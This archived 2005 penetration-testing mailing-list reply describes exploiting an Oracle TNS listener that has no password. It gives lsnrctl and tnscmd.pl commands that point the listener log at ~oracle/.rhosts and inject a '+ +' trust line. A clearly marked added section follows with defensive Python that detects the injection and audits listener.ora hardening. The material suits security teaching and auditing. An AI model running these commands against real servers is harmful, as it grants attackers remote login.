Penetration Testing mailing list archives
Re: Oracle Auditing
From: Joshua Wright <jwright () hasborg com>
Date: Tue, 02 Aug 2005 21:49:55 -0400
Joe,

Joe T wrote:

> When performing some network scans, I notice that the Oracle database rarely has a password set for the tnslsnr account. My question becomes: Has anyone exploited this misconfiguration, and if so - how? Is this an account that you can connect to without expensive Oracle software?
If the listener is not password protected, it's possible to change the configuration of the listener or simply shut it down to cause a DoS. To do something more devious, we can use the listener logging feature (on the attacker's machine with a local copy of lsnrctl):

  eve$ lsnrctl
  LSNRCTL> set current_listener target_ip_or_host
  LSNRCTL> set log_file /home/oracle/.rhosts
  LSNRCTL> exit

This will configure the listener to write logging information to the specified file. Next, we can use the tnscmd.pl tool to send a raw string to the victim TNS listener:

  eve$ tnscmd.pl -h target_ip_or_host --rawcmd "(CONNECT_DATA=((
  + +
  "
  eve$

This will connect to the listener and send the string "(CONNECT_DATA=((<CR>+ +<CR>". This information gets written to the listener log file, which would produce a single line with "+ +".

If the target isn't running r-services, you can use other techniques to obtain access to the remote OS. Perhaps ~oracle/.ssh/authorized_key2?

Note that you can download a trial version of the Oracle database from otn.oracle.com, which would allow you to grab a copy of the lsnrctl tool.

This sample hack and several other Oracle auditing, assessment and pen-test techniques are covered in the SANS Securing Oracle course. SANS is offering the Securing Oracle course at our yearly Network Security conference in New Orleans on 10/24-10/30. More information on the Securing Oracle course and the topics covered is available at http://www.sans.org/ns2005/description.php?tid=247.

NB: I work for the SANS Institute, and teach the Securing Oracle class (although I'll be teaching Assessing and Securing Wireless at the Network Security conference).

-Josh

--
-Joshua Wright
jwright () hasborg com
2005-2006 pgpkey: http://802.11ninja.net/pgpkey.htm
fingerprint: F00E 7A42 8375 0C55 964F E5A4 4D2F 22F6 3658 A4BF

Today I stumbled across the world's largest hotspot. The SSID is "linksys".
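The exchange above relies on two things that are easy to lose sight of when it is typed at a prompt: the raw string goes out inside an ordinary TNS CONNECT packet (which is all tnscmd.pl builds around it), and the only thing that makes the string dangerous is the line breaks inside it. The following is an added example, not code from Joshua Wright's post or from tnscmd.pl. It frames a connect string the way tnscmd.pl does (the 58-byte header layout is the standard TNS connect header that tool uses), parses it back as a listener or IDS would, flags connect data that carries CR/LF (the tell for this log-file trick), and audits a constructed listener.ora for the two settings that shut the trick down. The listener.ora text, its hashed password value, the host name, and the use of LF as the line terminator (the post shows it as <CR>) are assumptions made for the example; the PASSWORDS_LISTENER and ADMIN_RESTRICTIONS_LISTENER keywords are not mentioned in the post.

```python
"""Added example: TNS CONNECT framing, log-injection detection, listener.ora audit.
Not part of the original post or of tnscmd.pl; sample data below is constructed."""
import re
import struct

TNS_CONNECT = 1          # TNS packet type for a CONNECT packet
CONNECT_HDR_LEN = 58     # 8-byte TNS header + 50-byte connect header


def build_tns_connect(connect_data: bytes) -> bytes:
    """Wrap connect_data in a TNS CONNECT packet, same header tnscmd.pl sends for --rawcmd."""
    total = CONNECT_HDR_LEN + len(connect_data)
    tns_header = struct.pack(">HHBBH", total, 0, TNS_CONNECT, 0, 0)  # len, csum, type, rsvd, hdr csum
    connect_header = struct.pack(
        ">HHHHHHHHHHIBBIIQ8x",
        0x0136,            # protocol version 310
        0x012C,            # lowest compatible version 300
        0x0000,            # service options
        0x0800,            # SDU size 2048
        0x7FFF,            # TDU size
        0x7F08,            # NT protocol characteristics
        0x0000,            # line turnaround
        0x0001,            # "value of 1 in hardware" byte-order probe
        len(connect_data),  # length of connect data
        CONNECT_HDR_LEN,   # offset of connect data from packet start
        0,                 # max receivable connect data
        0, 0,              # connect flags
        0, 0,              # trace cross-facility items
        0,                 # trace unique connection id (8 unused bytes follow)
    )
    return tns_header + connect_header + connect_data


def parse_tns_connect(packet: bytes) -> dict:
    """Inverse of build_tns_connect; rejects wrong type, bad length field or truncated data."""
    if len(packet) < CONNECT_HDR_LEN:
        raise ValueError("short TNS packet")
    length, _csum, ptype, _rsvd, _hcsum = struct.unpack(">HHBBH", packet[:8])
    if ptype != TNS_CONNECT:
        raise ValueError("not a CONNECT packet: type %d" % ptype)
    if length != len(packet):
        raise ValueError("length field %d but %d bytes on the wire" % (length, len(packet)))
    data_len, data_off = struct.unpack(">HH", packet[24:28])
    data = packet[data_off:data_off + data_len]
    if len(data) != data_len:
        raise ValueError("connect data truncated")
    return {"length": length, "data_off": data_off, "connect_data": data}


def log_injection_indicators(connect_data: bytes) -> list:
    """Return the extra lines a sender smuggles in via CR/LF.

    A legitimate connect string is one line of nested (KEY=VALUE) pairs; a line
    break inside it only makes sense if the sender wants a line of their own in
    whatever file log_file currently points at (.rhosts, authorized_keys, ...).
    """
    lines = re.split(rb"\r\n|\r|\n", connect_data)
    return [ln for ln in lines[1:] if ln.strip()]


def audit_listener_ora(text: str, listener: str = "LISTENER") -> list:
    """Flag the settings whose absence lets an unauthenticated 'set log_file' through."""
    params = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z_0-9]+)\s*=\s*(.*?)\s*$", line)
        if m:
            params[m.group(1).upper()] = m.group(2)
    findings = []
    if "PASSWORDS_%s" % listener not in params:
        findings.append("no PASSWORDS_%s: lsnrctl SET/STOP accepted without a password" % listener)
    if params.get("ADMIN_RESTRICTIONS_%s" % listener, "OFF").upper() != "ON":
        findings.append("ADMIN_RESTRICTIONS_%s not ON: runtime SET commands such as "
                        "'set log_file' are still honoured" % listener)
    return findings


# Constructed listener.ora fragments (host name and password hash are made up).
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db1.example.test)(PORT = 1521))
    )
  )
LOG_FILE_LISTENER = listener.log
"""
HARDENED_LISTENER_ORA = WEAK_LISTENER_ORA + """
PASSWORDS_LISTENER = 7D9A4F2E1B3C6A5E
ADMIN_RESTRICTIONS_LISTENER = ON
"""

if __name__ == "__main__":
    # The post's payload; LF assumed as the line terminator the post draws as <CR>.
    payload = b"(CONNECT_DATA=((\n+ +\n"
    pkt = build_tns_connect(payload)
    parsed = parse_tns_connect(pkt)
    print("TNS CONNECT: %d bytes, connect data at offset %d" % (parsed["length"], parsed["data_off"]))
    print("smuggled lines:", log_injection_indicators(parsed["connect_data"]))
    for name, cfg in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        print(name, audit_listener_ora(cfg) or ["ok"])
```

Run as-is it prints the packet size (79 bytes for the 21-byte payload), the single smuggled line `+ +`, and the two findings for the weak configuration versus none for the hardened one. The detection rule is deliberately narrow: it does not try to understand the connect descriptor, it only asks whether the sender put a line break in it, which no lsnrctl or client driver does.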
Current thread:
- Oracle Auditing Joe T (Aug 02)
- RE: Oracle Auditing Clement Dupuis (Aug 02)
- Re: Oracle Auditing Joshua Wright (Aug 02)
- Re: Oracle Auditing DokFLeed (Aug 03)
- Re: Oracle Auditing Thor (Hammer of God) (Aug 03)
- RE: Oracle Auditing Erez (Aug 03)
- Re: Oracle Auditing David Eduardo Acosta Rodríguez (Aug 03)
- Re: Oracle Auditing Pete Finnigan (Aug 12)